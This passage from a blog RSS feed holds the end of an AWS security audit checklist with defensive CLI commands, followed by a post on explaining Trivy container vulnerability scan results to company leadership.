&lt;p&gt;Every region has a default VPC. It's built for quick-start demos: public subnets, an internet gateway, public IPs by default. It's not where production should live.&lt;/p&gt;

&lt;p&gt;I check whether the default VPC has any ENIs attached. If it does, something's running there - and it's usually not supposed to be.&lt;/p&gt;
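
&lt;p&gt;A minimal sketch of that ENI check for the current region (the variable name &lt;code&gt;VPC_ID&lt;/code&gt; is just for illustration):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Find the default VPC in the current region
VPC_ID=$(aws ec2 describe-vpcs --filters Name=is-default,Values=true \
  --query 'Vpcs[0].VpcId' --output text)

# List every network interface in it - any output means something lives there
aws ec2 describe-network-interfaces --filters Name=vpc-id,Values="$VPC_ID" \
  --query 'NetworkInterfaces[].[NetworkInterfaceId,InterfaceType,Description]' \
  --output text
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;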

&lt;p&gt;The fix isn't "delete the default VPC" immediately. The fix is: migrate workloads to a custom VPC with private subnets, NAT, proper routing - then delete the default VPC once it's empty.&lt;/p&gt;

&lt;h3&gt;
  
  
  12. Security groups open to the world
&lt;/h3&gt;

&lt;p&gt;This is the big one. I see it everywhere.&lt;/p&gt;

&lt;p&gt;Inbound rules allowing &lt;code&gt;0.0.0.0/0&lt;/code&gt; on sensitive ports:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Port&lt;/th&gt;
&lt;th&gt;Service&lt;/th&gt;
&lt;th&gt;Risk&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;22&lt;/td&gt;
&lt;td&gt;SSH&lt;/td&gt;
&lt;td&gt;Direct shell access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3389&lt;/td&gt;
&lt;td&gt;RDP&lt;/td&gt;
&lt;td&gt;Remote desktop access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3306&lt;/td&gt;
&lt;td&gt;MySQL&lt;/td&gt;
&lt;td&gt;Direct database access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5432&lt;/td&gt;
&lt;td&gt;PostgreSQL&lt;/td&gt;
&lt;td&gt;Direct database access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1433&lt;/td&gt;
&lt;td&gt;MSSQL&lt;/td&gt;
&lt;td&gt;Direct database access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6379&lt;/td&gt;
&lt;td&gt;Redis&lt;/td&gt;
&lt;td&gt;Often unauthenticated by default&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;27017&lt;/td&gt;
&lt;td&gt;MongoDB&lt;/td&gt;
&lt;td&gt;Historically no auth&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9200&lt;/td&gt;
&lt;td&gt;Elasticsearch&lt;/td&gt;
&lt;td&gt;Full cluster access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5601&lt;/td&gt;
&lt;td&gt;Kibana&lt;/td&gt;
&lt;td&gt;Dashboard access, often weak/no auth&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The worst one I've seen: a security group that allowed &lt;em&gt;all traffic&lt;/em&gt; (protocol &lt;code&gt;-1&lt;/code&gt;) from &lt;code&gt;0.0.0.0/0&lt;/code&gt;. Every port, every protocol, from anywhere. On a production database server.&lt;/p&gt;

&lt;p&gt;"But we have a firewall in front." Security groups &lt;em&gt;are&lt;/em&gt; your firewall. That's the point.&lt;/p&gt;
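
&lt;p&gt;A quick first pass for finding these groups, as a sketch. It lists every group with at least one inbound rule open to &lt;code&gt;0.0.0.0/0&lt;/code&gt;, so it will also flag legitimate 80/443 rules; you still need to look at the ports on each hit.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Security groups with at least one inbound rule open to the whole internet
aws ec2 describe-security-groups \
  --filters Name=ip-permission.cidr,Values=0.0.0.0/0 \
  --query 'SecurityGroups[].[GroupId,GroupName]' --output text
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;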

&lt;h3&gt;
  
  
  13. VPC flow logs disabled
&lt;/h3&gt;

&lt;p&gt;Flow logs give you visibility: source, destination, port, accept/reject. Without them, when something weird happens, you're basically guessing.&lt;/p&gt;

&lt;p&gt;I usually skip empty default VPCs here because it's noise. But any custom VPC that runs workloads should have flow logs turned on (CloudWatch Logs or S3).&lt;/p&gt;
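
&lt;p&gt;Checking a single VPC is one call. A sketch with a placeholder VPC ID:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Flow logs attached to one VPC; empty output means none are configured
aws ec2 describe-flow-logs \
  --filter Name=resource-id,Values=vpc-0123456789abcdef0 \
  --query 'FlowLogs[].[FlowLogId,LogDestinationType,FlowLogStatus]' --output text
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;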

&lt;h2&gt;
  
  
  RDS, the crown jewels
&lt;/h2&gt;

&lt;p&gt;Databases hold the money: customer data, financial records, PII. If your DB is exposed or poorly configured, nothing else matters.&lt;/p&gt;

&lt;h3&gt;
  
  
  14. Publicly accessible RDS instances
&lt;/h3&gt;

&lt;p&gt;RDS has a setting: "Publicly accessible." It defaults to No… and yet I keep finding it set to Yes.&lt;/p&gt;

&lt;p&gt;A publicly accessible RDS instance gets a public DNS name that resolves to a public IP. Even if the security group is tight today, one accidental change later and your database is exposed to the internet.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws rds modify-db-instance &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--db-instance-identifier&lt;/span&gt; my-database &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--no-publicly-accessible&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--apply-immediately&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One flag. Immediate effect. No downtime.&lt;/p&gt;

&lt;h3&gt;
  
  
  15. Unencrypted RDS storage
&lt;/h3&gt;

&lt;p&gt;Same as EBS, but higher stakes because databases usually contain your most sensitive data.&lt;/p&gt;

&lt;p&gt;And the same painful limitation: you can't enable encryption on an existing running instance. You have to snapshot, copy with encryption, restore - meaning downtime and planning.&lt;/p&gt;

&lt;p&gt;That's why it gets postponed forever: "Next sprint." For the last 18 months.&lt;/p&gt;
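
&lt;p&gt;For planning purposes, the snapshot-copy-restore path looks roughly like this. It's a sketch, not a runbook: all identifiers are placeholders, &lt;code&gt;alias/aws/rds&lt;/code&gt; is the AWS-managed key (swap in your own KMS key if you use one), and the cutover to the new instance is left out.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# 1. Snapshot the unencrypted instance and wait until it is available
aws rds create-db-snapshot --db-instance-identifier my-database \
  --db-snapshot-identifier my-database-plain
aws rds wait db-snapshot-available --db-snapshot-identifier my-database-plain

# 2. Copy the snapshot; supplying a KMS key makes the copy encrypted
aws rds copy-db-snapshot \
  --source-db-snapshot-identifier my-database-plain \
  --target-db-snapshot-identifier my-database-encrypted \
  --kms-key-id alias/aws/rds
aws rds wait db-snapshot-available --db-snapshot-identifier my-database-encrypted

# 3. Restore a new, encrypted instance from the copy
aws rds restore-db-instance-from-db-snapshot \
  --db-instance-identifier my-database-new \
  --db-snapshot-identifier my-database-encrypted
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;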

&lt;h3&gt;
  
  
  16. No Multi-AZ deployment
&lt;/h3&gt;

&lt;p&gt;Not security - reliability. But it matters because when a single-AZ database dies at 3 AM on a Friday, the on-call person will instantly wish someone had enabled Multi-AZ.&lt;/p&gt;

&lt;p&gt;Multi-AZ gives you automatic failover: minutes of disruption instead of hours of recovery.&lt;/p&gt;

&lt;p&gt;I don't usually flag tiny dev/test instances here, but anything that looks like production should have Multi-AZ.&lt;/p&gt;
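
&lt;p&gt;A sketch for finding single-AZ instances and converting one (&lt;code&gt;my-database&lt;/code&gt; is a placeholder; Aurora clusters handle availability differently and aren't covered here):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Instances that are not Multi-AZ
aws rds describe-db-instances \
  --query 'DBInstances[?MultiAZ==`false`].[DBInstanceIdentifier,DBInstanceClass]' \
  --output text

# Convert one to Multi-AZ
aws rds modify-db-instance --db-instance-identifier my-database \
  --multi-az --apply-immediately
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;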

&lt;h2&gt;
  
  
  Cost, the quiet warning light
&lt;/h2&gt;

&lt;p&gt;Not security findings, but they tell you how well the team manages the account. If money is leaking through obvious holes, security is usually leaking too.&lt;/p&gt;

&lt;h3&gt;
  
  
  17. Unattached Elastic IPs
&lt;/h3&gt;

&lt;p&gt;An unused Elastic IP costs about $3.65/month. Not huge - until you find 15-20 of them scattered across regions. That's roughly $55-$73/month for nothing.&lt;/p&gt;

&lt;p&gt;More importantly: if nobody noticed 20 orphaned EIPs, what else has been sitting around unnoticed?&lt;/p&gt;
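
&lt;p&gt;Finding them is a one-liner per region. A sketch, with a placeholder allocation ID in the release step:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Elastic IPs with no association in the current region
aws ec2 describe-addresses \
  --query 'Addresses[?AssociationId==`null`].[PublicIp,AllocationId]' --output text

# Release one you are sure nobody needs
aws ec2 release-address --allocation-id eipalloc-0123456789abcdef0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;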

&lt;h2&gt;
  
  
  So… what now?
&lt;/h2&gt;

&lt;p&gt;If you read this and thought "we probably have a few of these," you do. Everyone does.&lt;/p&gt;

&lt;p&gt;It's not a knowledge problem. Most engineers already know they should enforce MFA and encrypt databases. The real issue is visibility: nobody runs these checks regularly. No dashboard. No routine. So each quarterly audit finds 40 issues, the team fixes 20, and by next quarter there are 45 again.&lt;/p&gt;

&lt;p&gt;I used to run these checks by hand before every audit. Same commands, same console clicks, same mental checklist. Eventually I just automated the whole thing.&lt;/p&gt;

&lt;p&gt;The result is a CLI tool that runs all 17 checks in ~12 seconds and outputs a prioritized report with fixes, AWS CLI commands, and Terraform snippets for each finding.&lt;/p&gt;

&lt;p&gt;It's open source: &lt;strong&gt;&lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;cloud-audit on GitHub&lt;/a&gt;&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;cloud-audit
cloud-audit scan
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No config, no stored credentials, no SaaS dashboard. It uses the AWS credentials you already have and prints a report.&lt;/p&gt;

&lt;p&gt;If your setup needs more than automated checks - architecture review, remediation planning, Terraform migration - &lt;a href="https://haitmg.pl/#contact" rel="noopener noreferrer"&gt;that's what I do for a living&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>devops</category>
      <category>cloud</category>
    </item>
    <item>
      <title>89 critical vulnerabilities and nothing is on fire</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Sat, 28 Feb 2026 22:04:17 +0000</pubDate>
      <link>https://dev.to/haitmg/89-critical-vulnerabilities-and-nothing-is-on-fire-7c7</link>
      <guid>https://dev.to/haitmg/89-critical-vulnerabilities-and-nothing-is-on-fire-7c7</guid>
      <description>&lt;p&gt;Trivy runs every month, and this month was no different. The pipeline posted the results straight into our channel: 89 CRITICAL findings across 54 container images. Just another routine scan.&lt;/p&gt;

&lt;p&gt;A little later, the CEO sent me a short note. He asked whether the issue in the security report needed immediate attention, and whether we were facing something serious.&lt;/p&gt;

&lt;p&gt;That's harder to answer than you might think. The honest answer is "probably not" - but there's a reason behind it, and that reason never fits neatly into a quick message. Explaining takes space, and you rarely get that space.&lt;/p&gt;

&lt;p&gt;My first attempts didn't go well. At first I just sent over the Trivy JSON file with a note saying "see attached." Nobody opened it. Then I swung the other way: walls of text unpacking each CVE one by one. Still nothing. One day the CTO cut in while I was presenting and told me to "say it in plain English." I was already speaking English.&lt;/p&gt;

&lt;p&gt;Figuring out what actually clicks took a while, but now it makes sense.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why raw scan results don't work for leadership
&lt;/h2&gt;

&lt;p&gt;A single Trivy scan of 54 container images in a Kubernetes cluster typically produces numbers like these:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Severity&lt;/th&gt;
&lt;th&gt;Count&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CRITICAL&lt;/td&gt;
&lt;td&gt;89&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;HIGH&lt;/td&gt;
&lt;td&gt;612&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MEDIUM&lt;/td&gt;
&lt;td&gt;1,247&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LOW&lt;/td&gt;
&lt;td&gt;731&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;That 89 looks alarming at first glance - yet nearly all of those flaws sit in systems behind our firewall. They're only reachable over the VPN, so outsiders can't touch them directly. Until you check which components are exposed to the internet, the number tells you very little. What matters is reachability, not just counts.&lt;/p&gt;

&lt;p&gt;What management actually wants to know:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Is any of this actually exploitable in our setup?&lt;/li&gt;
&lt;li&gt;Are any of the affected components exposed to the internet?&lt;/li&gt;
&lt;li&gt;Are things getting worse, or is the number up only because new CVEs were published?&lt;/li&gt;
&lt;li&gt;What have we already patched and what's still open?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;CVE-2024-something means nothing to them. What matters is risk.&lt;/p&gt;

&lt;h2&gt;
  
  
  How I organize these reports today
&lt;/h2&gt;

&lt;p&gt;Finding the right format took ages. Eventually I settled on four parts. Plain structure, nothing flashy.&lt;/p&gt;

&lt;h3&gt;
  
  
  What we scanned and what changed
&lt;/h3&gt;

&lt;p&gt;Without scope, people just see big numbers and freak out. So I always open with what we actually scanned:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"We scan all 54 infrastructure container images using Trivy every month. This covers cluster stuff - storage controllers, networking, monitoring, databases. Not business applications. This month we upgraded 5 components and did a Kubernetes engine bump."&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This does two things. Sets up that scanning is routine, not a fire drill. And anchors those numbers to infra images specifically. 89 CRITICAL across 54 infra containers hits different than 89 CRITICAL on your customer-facing app.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why the number went up after we patched
&lt;/h3&gt;

&lt;p&gt;This always gets the same reaction. We upgraded stuff. The number went up. What?&lt;/p&gt;

&lt;p&gt;Looks weird on a slide, yeah. But it's usually not a regression. Between the two scans, 27 new CVE entries were published in the public vulnerability databases. On its next run, Trivy picks up those newly listed issues and flags them. The systems didn't get worse - more flaws in widely used code simply came to light.&lt;/p&gt;

&lt;p&gt;Without a clear explanation, managers will assume you're losing ground. Their mental model is simple: a lower number means things got fixed, so a higher number must mean things got worse. Break that assumption early, or every report turns into a defense.&lt;/p&gt;
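
&lt;p&gt;If you keep last month's scan around, you can show exactly which IDs are new instead of just asserting it. A sketch using standard tools: the function name &lt;code&gt;new_cves&lt;/code&gt; and the file names are made up, and each input file is assumed to hold one CVE ID per line.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Prints IDs that appear in the second file but not in the first.
# Both inputs are sorted into temp files first because comm needs sorted input.
new_cves() {
  old_sorted=$(mktemp)
  new_sorted=$(mktemp)
  sort -u -o "$old_sorted" "$1"
  sort -u -o "$new_sorted" "$2"
  comm -13 "$old_sorted" "$new_sorted"
  rm -f "$old_sorted" "$new_sorted"
}

# Usage: new_cves february-cves.txt march-cves.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;One way to produce those ID lists, assuming &lt;code&gt;jq&lt;/code&gt; is installed and the scans were saved with &lt;code&gt;--format json&lt;/code&gt;, is to pull &lt;code&gt;.Results[]?.Vulnerabilities[]?.VulnerabilityID&lt;/code&gt; out of each report.&lt;/p&gt;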

&lt;h3&gt;
  
  
  Breakdown by actual risk
&lt;/h3&gt;

&lt;p&gt;Here's where things usually go off track. Most people rank flaws by CVSS alone and call it done. That 9.8 rating? Looks terrifying - until you read the fine print. Imagine the exploit needs a specially crafted CMS packet sent to a module that ignores such packets entirely, sitting on an internal network, shielded by a VPN. Suddenly, not so urgent.&lt;/p&gt;

&lt;p&gt;For every component group, I answer three questions: what the finding means in plain language, whether it affects how we work right now, and when the fix will arrive.&lt;/p&gt;

&lt;p&gt;For example: a few CVEs showed up in the XML parser our load balancer uses. That might sound alarming at first. But this load balancer only handles traffic between backend systems, so external data never reaches it directly, and any exploitation would require prior access to our internal network. The fix is ready - it's just held back until the vendor's upcoming update drops. That rollout fits into the planned March maintenance window, same slot as always: first Wednesday, 22:00 to 23:00 CET.&lt;/p&gt;

&lt;p&gt;Here's how it looks in table form:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component Group&lt;/th&gt;
&lt;th&gt;CRITICALs&lt;/th&gt;
&lt;th&gt;Real Risk&lt;/th&gt;
&lt;th&gt;Internet-Exposed&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Storage system&lt;/td&gt;
&lt;td&gt;32&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cluster networking&lt;/td&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kubernetes engine&lt;/td&gt;
&lt;td&gt;19&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Monitoring stack&lt;/td&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Load balancer&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Minimal&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tracing + auth proxy&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dashboards&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Log shipping&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Minimal&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;That "No" column all the way down? That's the whole point. Everything sits behind the VPN. TLS terminates at the ingress controller but the vulnerable components aren't on that path. To exploit any of this you'd need to already be inside the network.&lt;/p&gt;

&lt;h3&gt;
  
  
  What we did, what we're doing, what we're blocked on
&lt;/h3&gt;

&lt;p&gt;Actions with dates. Just that.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Priority&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;th&gt;Timeline&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Track Go stdlib updates (affects 25+ images)&lt;/td&gt;
&lt;td&gt;Ongoing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Upgrade storage system to the updated version&lt;/td&gt;
&lt;td&gt;Next maintenance window&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Update load balancer for XML and SQLite fixes&lt;/td&gt;
&lt;td&gt;March&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Fix tracing setup once upstream patch arrives&lt;/td&gt;
&lt;td&gt;After upstream release&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The tracing one is stuck because the latest version breaks dashboard rendering. Maintainers know about it, there's an open issue with 40+ comments, but no fix yet. So we wait. That's not us being slow - that's the reality of running on open-source.&lt;/p&gt;

&lt;p&gt;And this is what management needs to get: most of our "inaction" is waiting for upstream. We use official container images. When Go stdlib gets a CVE, every single Go-based tool in the cloud-native ecosystem gets hit. We can't fix it before the Go team does.&lt;/p&gt;

&lt;h2&gt;
  
  
  The framing that helped the most
&lt;/h2&gt;

&lt;p&gt;Most of those 89 CRITICALs weren't 89 different fires. It was a handful of root causes - mainly the Go stdlib thing - that propagated across every Go-based image we run. Not "our infra is broken." More like "the entire cloud-native ecosystem has a known issue and we're tracking the upstream fix like everyone else."&lt;/p&gt;

&lt;p&gt;When I frame it like that in the report, the reaction shifts. Not "why is our stuff broken" but "ok, so this is an industry thing." Which is what it actually is.&lt;/p&gt;
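
&lt;p&gt;You can back that framing with numbers by counting CRITICAL findings per package across all scan outputs. A sketch under assumptions: the reports were written with Trivy's &lt;code&gt;--format json&lt;/code&gt;, &lt;code&gt;jq&lt;/code&gt; is installed, and there is one JSON file per image in a hypothetical &lt;code&gt;scans/&lt;/code&gt; directory.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Count CRITICAL findings per package across every scan file, biggest first
jq -r '.Results[]?.Vulnerabilities[]? | select(.Severity == "CRITICAL") | .PkgName' \
  scans/*.json | sort | uniq -c | sort -rn | head
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;If one or two package names account for most of the lines, that's the "handful of root causes" story in a form you can paste into the report.&lt;/p&gt;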

&lt;h2&gt;
  
  
  Things that went wrong before I figured this out
&lt;/h2&gt;

&lt;p&gt;Once I sent a report that was just the raw numbers along with "5 components upgraded this month." No context on the CRITICAL count. My manager forwarded it to the VP. The VP saw 89 CRITICAL and almost delayed a product launch. Over vulnerabilities in internal monitoring tools that aren't even reachable from outside. Took a 30-minute call to undo that.&lt;/p&gt;

&lt;p&gt;Another time a manager asked me "when will we have zero vulnerabilities?" I said "never" without any explanation. That went over about as well as you'd expect. What I should have said - and what I say now - is that any infrastructure running open-source will always have known CVEs. Always. Not about reaching zero. It's about whether they're exploitable in our specific environment and whether we have a process to patch them.&lt;/p&gt;

&lt;p&gt;The worst is sending numbers without the "so what." People see 89 CRITICAL and fill in the blanks with their imagination. And their imagination usually involves hackers. Give them the numbers AND the context or don't send anything at all.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why I keep doing this monthly
&lt;/h2&gt;

&lt;p&gt;Writing these reports isn't fun. Not why I got into this field. But they've made my life easier in ways I didn't expect.&lt;/p&gt;

&lt;p&gt;When our CEO now sees "storage system upgrade" on the maintenance calendar, he already knows that means getting rid of 32 critical vulnerabilities in our storage layer. No need to justify the downtime window anymore. He just approves it. I send a message and get a thumbs up.&lt;/p&gt;

&lt;p&gt;That only works because he's been reading these reports for months and trusts the process. Without that trust, every maintenance window is a negotiation.&lt;/p&gt;

&lt;p&gt;Zero CVEs is never going to happen. Can't happen, won't happen. But a leadership team that understands what the numbers mean, trusts that you're handling things, and doesn't block your maintenance windows? That's doable. And it starts with a report that doesn't just dump numbers.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Running Kubernetes in production and need help with vulnerability management? &lt;a href="https://haitmg.pl/#contact" rel="noopener noreferrer"&gt;Let's talk&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>devops</category>
      <category>kubernetes</category>
      <category>leadership</category>
    </item>
  </channel>
</rss>
